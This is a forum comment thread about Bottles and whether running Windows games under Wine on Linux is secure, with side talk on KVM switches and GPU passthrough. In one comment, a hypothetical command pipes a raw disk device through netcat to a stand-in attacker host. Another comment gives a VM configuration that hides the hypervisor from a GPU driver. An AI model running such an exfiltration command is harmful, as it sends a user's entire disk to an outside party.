Bottles – Run Windows software and games on Linux
github.com
github.com
The small price I pay for having to manually type a Steam authentication code from my phone into the gaming PC is worth it to never have to worry about the insane level of insecurity and bugs from the gaming sphere. The amount of RCE in gaming is pretty bad. And, you know, sometimes your friends message you and want to play a game that is new and from a developer nobody can really trust.
Combine that with the fact that the first thing almost every game does is phone home to try and download new executable content and IMO you would be irresponsible to keep your important documents/credentials on a system that is also used for gaming.
Windows and security is a poor combination to begin with.
1. WINE et al run in a sandboxed environment. You cannot execute other Linux software without then also finding an RCE in WINE. So that’s multiple RCEs needed in multiple points of the stack and the attacker needs to be aware that you’re running the uncommon set up of that Windows software running in WINE.
2. The amount of Windows software installed in WINE is limited. So you don’t have a large attack surface of Windows software. That not only limits the amount an attacker can do in the sandbox but also limits the surface area that further RCEs might exist
3. Even if you could escape WINE you’re then stuck with the problem that you don’t know what the host OS is. So you’re stuck with generalised POSIX or GNU. Which might still be common but far far less common than going after Windows users.
Are you sure about this? I was the impression that there's nothing preventing an .exe running under Wine from just issuing Linux syscalls, eg. execve.
EDIT: I just tested this, and indeed there doesn't seem to be any sandboxing:
cursed.c: https://gist.github.com/q3k/e5952111283ea59ee78a7699919a055b
cursed.exe (built in msys2): https://object.ceph-eu.hswaw.net/q3k-personal/b8159d43e0698d...
$ wine cursed.exe
hello from win32
hello from linux
hello from execveThe modding community maintains its own 'anti-cheat' system called Blue Sentinel, which was updated day-of to block the RCE exploit. At least, the same day the warning was made in the Discord servers I'm still in.
The agreed upon solution to this is to make the home directory readable, then split the files into a `~/public` and `~/private` directory, which is well accepted in the server space but completely non-adopted and not straightforward in the desktop space. It's technically possible to modify your $XDG_DATA_DIR and other similar configurations, but many programs and tools still don't care and will only look for and operate on configuration files in `~/.config` or `~/.local` or worse yet just `~/.foo`.
If you only care about playing a game now and then without caring what might happen in 4-5 years consoles might be ok, but i think that everyone eventually will find a game they'd like to be able to re/play 10+ years later on their current hardware and consoles make that hard.
I'd have to say the console experience (circa 2013) is not at all without headaches.
Not everyone has the space and money for this. In fact most people don't and when you buy a powerful PC for games you most likely also want to use it for your other PC tasks too - especially if you are a developer. Even if one has both the space and money, they may just not want to "task switch" between different machines (e.g. i do have a bunch of computers in my place but 99% of the time i use just one). Also switching between games and work in a different virtual desktop or whatever is way faster and more convenient than even rolling your chair to some other desk to another PC.
> I keep all the things I actually care about or don't want stolen on my Linux system with full drive encryption and I keep a gaming PC that has absolutely nothing I care about on it. The Windows system is never allowed to access my email, credit cards, or anything I care about in any way.
Neat, but the same applies if you are running games under Wine since everything is running under Linux and not Windows. You do not even need to have Windows installed. If you are too paranoid to even touch an EXE because it might access other stuff in your home directory you can run the games under a different user with access only to that user's files.
> worry about the insane level of insecurity and bugs from the gaming sphere. The amount of RCE in gaming is pretty bad.And, you know, sometimes your friends message you and want to play a game that is new and from a developer nobody can really trust.
If you do not trust a developer it is much easier and safer to not download and run the game. If there is any issue with the game, it'll be quickly figured out. It is not any different than a game targeting Linux or really any other piece of software.
> Combine that with the fact that the first thing almost every game does is phone home to try and download new executable content and IMO you would be irresponsible to keep your important documents/credentials on a system that is also used for gaming.
This is what pretty much EVERY software - game related or not - for pretty much EVERY OS that has some form of automatic updates does! Singling out Windows games is a bit of a double standard when your browser could be updated right tomorrow with a brand new bug that enables sites to access your SSH keys (AFAIK this has actually happened with Firefox on Linux).
If anything, at least if you are playing singleplayer games, it is much easier to keep games to a known well working version when you stick with DRM-free games like those you can buy from GOG, Zoom Platform, GamersGate (not all are DRM-free there but there is a filter), Humble Bundle (similar case, not all are DRM-free), etc instead of Steam.
Though even if you stick with Steam, i doubt Valve (or any other game store) wants to distribute actual malware from their service and things will either be fixed or removed.
I mean, seriously, running stuff with wine is OK if your expectatives are aligned with reality which is, you're running stuff there. If you complain about wine but then are completely fine with the typical 'curl XXX | bash" well, yeah, you're SoL but other than that some degree of separation is good.
But the point is to get rid of Windows completely without giving up the ability to play Windows games.
If you physically unplug your secure drive then you know for sure that no fun stuff is going on behind your back.
I'm not entirely sure about secure boot when it comes to validating the boot loader of an installed system so I can't vouch for that but I do know that UEFI kits aside, unless you have a proper way to validate the secure systems boot loader it could be tampered with if the disk is accessible by a compromised system.
IMO the point is not to get rid of windows but to isolate whichever insecure system you use in a way in which it can't hurt the secure system (it could even be a secondary Linux system where you use Wine if that's what you want)
Chrome did it before it became mainstream.
This was my plan too, but my intention was to keep the windows box offline 99% of the time (pretty much only connecting for downloads/installs). I still didn't like the idea of installing steam on the machine though since that would mean it's got my personal info on it and I'd be making purchases on it.
Now that steam thinks they can get a large number of games running on their Linux-based handheld shouldn't that mean most games should work on a linux desktop without much trouble? I'm hoping this means I can avoid windows 10/11 entirely.
Just a while ago for a CTF we implemented some hash breaking algorithms in OpenCL and CUDA and members of our team ran them on their own hardware. Firstly, we did it in Windows despite otherwise doing everything in Linux because the OpenCL/CUDA support and speed was leaps and bounds ahead on Windows. Next we compared the performance of hashes per second and it was orders of magnitude worse on AMD cards. We tweaked the algorithm a bit here and there to favor the AMD card and saw some minor gains, but overall we're talking a difference of 15/s versus 200/s in terms of how many hashes it was breaking per second.
I have a DisplayPort USB KVM switch to quickly switch monitor, headphones, mouse and keyboard between my mac mini (that I normally use) and the gaming PC.
I use my laptop open though, so I can still control it when using the windows pc.
For audio, I use a simple 3.5mm splitter. They work in both directions, so with the right combination of male/female 3.5mm cables you can merge the audio for about $10. There are fancier audiophile solutions too.
Something like synergy (from symless, there are competitors and FOSS alternatives but I can’t remember their names) might be good for your use case, to carry over m/kb input to the non-windows machine.
It also works via Internet out of the box with any shitty office notebook ;)
I have this hooked up, so that I push the switch and the monitor inputs automatically switch
I also have a (cheap) physical audio mixer to do the audio, but you can do the same thing with pulseaudio and a line-in cable from one computer to another
I'd say in order of seamlessness: KVM switch or monitor input switch Looking-glass parsec, steam in home streaming
I have a KVM switch as well but I kind of prefer to run things in a window.
There's a couple quality of life things about running windows in a VM as well. When it goes on it's update parade I can just close the window and ignore it. And with snapshotting a bad update can just be rolled back.
You can easily install all your games on another user on your linux box and run as that user. Super easy and it won't have access to any of your main home directory files. In fact with this configuration it's a lot easier to ensure that the games are sandboxed away from anything important.
In contrast on Windows most games run as Admin or at some point ask for admin privileges.
Running games on Linux is not about security or time savings. It's about control. It's about being able to sit down and play your game without Windows having a hissy fit about Windows updates. It's about being able to just play without worrying that some bad patch from Microsoft will hose your entire setup. And it's about finally wrestling control over gaming away from a company that cares more about taking your money than actually letting you play games you already have.
And the more people we get running Linux for gaming the better everyone will be better off for it.
Reminds me of https://xkcd.com/1200/ ; why would running games as admin matter in the slightest if your actually sensitive data, ~/Documents, is not even on that computer ? If it were on linux with another user, the game could still do `cat /dev/sda | nc evil.game.server` unlike here.
That's not true. Only root can read directly a disk device, or an user that is on the 'disk' group:
brw-rw---- 1 root disk 8, 0 fev 1 07:50 /dev/sda
I mean, it's quite obvious, exploitable bugs do not exist in Linux because back in the day Ken, Dennis, Brian, Doug and Joe agreed that they were not part of the Unix philosophy so they left them for windows to implement. /s
Aside from the stupid joke, what OP is saying is absolutely right, if you care about security keep your things properly isolated, keep a (whichever OS you trust but hopefully linux or a bsd) as main box and then a windows or macos computer isolated (best case scenario using a vlan capable switch, or a dedicated pi that acts as a firewall just for that box).
Really stinks because I was super interested in a GVT-g on their new discrete cards.
That's not true.
> or at some point ask for admin privileges.
Usually this is a UAC prompt so that the installer can deploy the game/app into Program Files. This isn't the fault of Windows and I'm fairly certain this could be avoided by the developer of the game/app.
> play your game without Windows having a hissy fit about Windows updates
You know you can defer updates and the nag? But then if you value your security then you'd install these updates (I lifted this from the start of your comment).
> without worrying that some bad patch from Microsoft will hose your entire setup
These are fairly rare, and personally never had it happen. I've hosed my Fedora install because the package manager really ballsed things up. But that was also a rare event.
I run both Windows and Linux and feel I'm in happily in control of both OS's.
This would be true also if you split your use cases into two Linux instances.
I have been told enough times that existence of RCE should be assumed as root access, because someone who can do RCE could probably do a PE too..
[0] 4 days, to be exact - https://nvd.nist.gov/vuln/detail/CVE-2021-4034
No, you can't play all your games on linux. Anti cheat is one of the big problems for example.
I carry out a similar mentality, I don’t trust Windows and hence I run things I don’t trust on Windows as well. Eg I only install Zoom native app on Windows but not on any other desktop OSes. Use windows like it is a public machine, and you’ll have nothing to lose. (It is just an analogy, not to mean an exact statement, because you always has something to lose… just minimally here.)
I agree with the part about running a dedicated system for gaming. I do the same but for creating music (I am not gaming).
On the other hand you don't need to do that on Windows so these tools still are useful.
I will add that if you have network segregation and firewalling between your main computer, your dedicated setup (gaming, whatever....) and the potential iot things running in your house it is even better.
Or use something like https://looking-glass.io/
Won't work with NVIDIA cards at all without a boatload of hacks (because they don't want consumer cards to be used in virtualized environments), and AMD cards are an utter pain in the ass to work with because AMD can't be bothered to get basic PCI stuff to work [1].
Also, you always run the risk of some anti-cheat solution detecting your virtualization environment and banning you permanently.
If you value your sanity, don't do gaming inside a VM.
[1]: https://www.nicksherlock.com/2020/11/working-around-the-amd-...
I've actually had good luck with AMD cards, but the reset bug is truly bizarre. For instance I own an evga R7 360, no reset bug, very reliable. I had also purchased an XFX R7 360, never survived a reboot! My sapphire RX 470 also works fine with no special actions from me and I've heard people have issues with that one.
You're definitely correct regarding anti-cheats though, they are something you have to watch out for.
Actually the hack required to do this is quite minimal. This is the only thing I had to do to get the driver unblocked in win10/win11 for my rtx3070. I lifted this directly from https://mathiashueber.com/fighting-error-43-nvidia-gpu-virtu...
<features>
<hyperv>
<vendor_id state='on' value='1234567890ab'/>
</hyperv>
<kvm>
<hidden state='on'/>
</kvm>
</features>I suppose once WSL2 GPU support improves I will be running Wine over WSL2 :)
If anyone has experience, and since the repository doesn't mention it, how is Bottles different from let's say Lutris, Q4Wine and PlayOnLinux that already exists and does something similar?
I've been using Linux for years, and the last time I had to mess with Wine prefixes I was super confused and it ended up not working (of course). :p
CrossOver and Proton ftw.
I just opened Lutris for the first time since then and I think I can see how to use it now. But I'll probably stick to my current ways because it works and really all of it's a pain anyway. Lutris is still invaluable for peeking through the installer scripts, though.
Compared to alternatives like Lutris is nice to use and has little redundancy
> This is the most supported and tested release of Bottles.
and AppImage:
> AppImage is broken, we are investigating, please use Flatpak in the meantime.
Even worse: a bug in the Flatpak version prevents the launching of Windows applications directly from the commandline, so you can't even manually create .desktop files for it!
What's wrong with Flatpak? I've had fewer problems with flatpak than with AppImage personally.
Also you should look closer at what "your entire filesystem" means. There are a lot of areas of the file system that are completely blacklisted with no actual way to enable them regardless of configuration. Important things like /etc and /usr just to name a few.